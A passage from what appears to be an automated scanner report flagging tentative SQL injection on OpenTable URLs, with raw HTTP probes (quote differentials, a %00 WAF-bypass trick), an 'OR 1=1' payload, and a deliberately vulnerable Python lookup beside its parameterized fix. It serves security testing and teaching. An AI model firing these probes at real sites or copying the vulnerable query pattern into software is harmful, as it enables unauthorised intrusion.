xserver: www598
Content-Length: 0
Content-Type: text/html


1.4. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.opentable.com
Path:   /b/ss/otrestref/1/H.22.1/s45203784920740

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/otrestref%00'/1/H.22.1/s45203784920740?AQB=1&pccr=true&vidn=2744D82905163E7C-40000198C000C552&&ndh=1&t=3%2F9%2F2011%207%3A53%3A59%201%20300&ce=UTF-8&pageName=reservationwidgetsinglesearchboxpage&g=http%3A%2F%2Fwww.grandcafe-sf.com%2F&r=http%3A%2F%2Fwww.kimptonhotels.com%2Frestaurants%2Frestaurant-reservations.aspx&cc=USD&ch=San%20Francisco%20Bay%20Area&events=event55&c1=San%20Francisco%20Bay%20Area%3Areservationwidget&v1=San%20Francisco%20Bay%20Area%3Areservationwidget&c2=San%20Francisco%20Bay%20Area%3Areservationwidget&v2=San%20Francisco%20Bay%20Area%3Areservationwidget&v5=ReservationWidget&c7=Logged%20Out&c9=reservationwidgetsinglesearchboxpage&c12=New&v12=New&c13=reservationwidgetsinglesearchboxpage&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&c32=Grand%20Cafe&v33=90&v36=anonymous&c38=reservationwidgetsinglesearchboxpage&v38=90&v39=San%20Francisco%20Bay%20Area&v43=reservationwidgetsinglesearchboxpage&v45=FrontdoorSearchBoxRestRef&v50=reservationwidgetsinglesearchboxpage&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:59:26 GMT
Server: Omniture DC/2.0.0
Content-Length: 407
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/otrestref was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/otrestref%00''/1/H.22.1/s45203784920740?AQB=1&pccr=true&vidn=2744D82905163E7C-40000198C000C552&&ndh=1&t=3%2F9%2F2011%207%3A53%3A59%201%20300&ce=UTF-8&pageName=reservationwidgetsinglesearchboxpage&g=http%3A%2F%2Fwww.grandcafe-sf.com%2F&r=http%3A%2F%2Fwww.kimptonhotels.com%2Frestaurants%2Frestaurant-reservations.aspx&cc=USD&ch=San%20Francisco%20Bay%20Area&events=event55&c1=San%20Francisco%20Bay%20Area%3Areservationwidget&v1=San%20Francisco%20Bay%20Area%3Areservationwidget&c2=San%20Francisco%20Bay%20Area%3Areservationwidget&v2=San%20Francisco%20Bay%20Area%3Areservationwidget&v5=ReservationWidget&c7=Logged%20Out&c9=reservationwidgetsinglesearchboxpage&c12=New&v12=New&c13=reservationwidgetsinglesearchboxpage&c17=4%3A30AM&v17=4%3A30AM&c18=Monday&v18=Monday&c19=Weekday&v19=Weekday&c32=Grand%20Cafe&v33=90&v36=anonymous&c38=reservationwidgetsinglesearchboxpage&v38=90&v39=San%20Francisco%20Bay%20Area&v43=reservationwidgetsinglesearchboxpage&v45=FrontdoorSearchBoxRestRef&v50=reservationwidgetsinglesearchboxpage&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1074&bh=906&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:59:26 GMT
Server: Omniture DC/2.0.0
xserver: www612
Content-Length: 0
Content-Type: text/html


1.5. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /irp/jquery/js/ScriptHandler.ashx

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /irp/jquery/js/ScriptHandler.ashx'?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:56:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a56%3a34&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /irp/jquery/js/ScriptHandler.ashx''?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:56:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a56%3a34&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:56:34 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...

1.6. http://www.opentable.com/jaspers-corner-tap-and-kitchen [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat on the evidence: as in 1.5, Response 1 is the generic 500.aspx error page served via the 404 handler and Response 2 is a 404; no database error text is visible, so the differential alone does not establish that the restaurant slug reaches a SQL query. This is consistent with the Tentative confidence; confirm with a database-specific probe before reporting it as SQL injection.

Request 1

GET /jaspers-corner-tap-and-kitchen'?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /jaspers-corner-tap-and-kitchen''?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:55:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...

1.7. http://www.opentable.com/jscripts/ScriptHandler.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /jscripts/ScriptHandler.ashx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat on the evidence: this is the same handler as 1.5 under a different path, and the responses show the same pattern (generic 500.aspx page via the 404 handler for the single quote, plain 404 for two quotes) with no database error text; the quote sits in a path segment, so path handling is at least as likely an explanation as a SQL query. Consistent with the Tentative confidence; confirm with a database-specific probe.
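Added example, not part of the XSS.CX report or the scanned application: the quote/double-quote differential that findings 1.5 through 1.8 rely on, reproduced against an in-memory SQLite table with constructed rows, beside the parameterized query that makes the differential disappear. The table, the slug values and the probe function are assumptions for illustration. The point a practitioner should take away is that the heuristic is necessary but not sufficient: a lone quote unbalances a SQL string literal and two quotes are the SQL escape for one, so vulnerable code shows error-then-no-error, but a generic application error page can show the same pattern with no query behind it.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the application's lookup table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE restaurant (id INTEGER PRIMARY KEY, slug TEXT)")
    conn.executemany(
        "INSERT INTO restaurant (id, slug) VALUES (?, ?)",
        [(90, "grand-cafe"), (200, "jaspers-corner-tap-and-kitchen")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, slug: str):
    # Vulnerable: the URL path segment is spliced into the SQL text.
    # slug = "x'"  -> ... slug = 'x''   (unterminated literal, parse error)
    # slug = "x''" -> ... slug = 'x'''  (escaped quote, parses, no rows)
    sql = "SELECT id FROM restaurant WHERE slug = '" + slug + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, slug: str):
    # Hardened: a bound parameter is sent as data and never parsed as SQL,
    # so ' and '' are simply two different slugs that match nothing.
    return conn.execute(
        "SELECT id FROM restaurant WHERE slug = ?", (slug,)
    ).fetchall()


def quote_differential(conn: sqlite3.Connection, lookup, base: str) -> bool:
    """Scanner heuristic: True if <base>' raises a database error but <base>'' does not.

    A True result is a reason to investigate, not a confirmed injection; an
    application that answers both probes with a generic error page (as in the
    responses recorded in this report) gives no signal to this function at all.
    """
    def errors(value: str) -> bool:
        try:
            lookup(conn, value)
            return False
        except sqlite3.Error:
            return True

    return errors(base + "'") and not errors(base + "''")
```

With the vulnerable lookup, the input "x' OR 1=1 --" returns every row; the parameterized lookup returns none for the same input. Before rating a differential above Tentative, pair it with a probe whose effect only a database can produce (a timing delay or an arithmetic comparison in the injected position).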

Request 1

GET /jscripts/ScriptHandler.ashx'?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:31 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a31&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=125; domain=.opentable.com; path=/
